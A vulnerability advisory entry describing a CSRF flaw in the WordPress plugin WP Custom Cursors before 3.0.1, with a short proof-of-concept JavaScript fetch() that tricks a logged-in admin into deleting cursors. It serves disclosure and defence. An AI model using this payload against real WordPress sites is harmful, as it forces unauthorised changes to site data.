WordPress Plugin Vulnerabilities
WP Custom Cursors < 3.0.1 - Arbitrary Cursor Deletion via CSRF
Description
The plugin does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.
Proof of Concept
Make a logged in admin open a page with the following JS code:
fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'submit&delete_row=1'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
This will make them delete the cursor with ID 1 Affects Plugins
Fixed in version 3.0.1
References
Classification
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-09-21 (about 8 months ago)
Added
2022-09-21 (about 8 months ago)
Last Updated
2022-10-04 (about 7 months ago)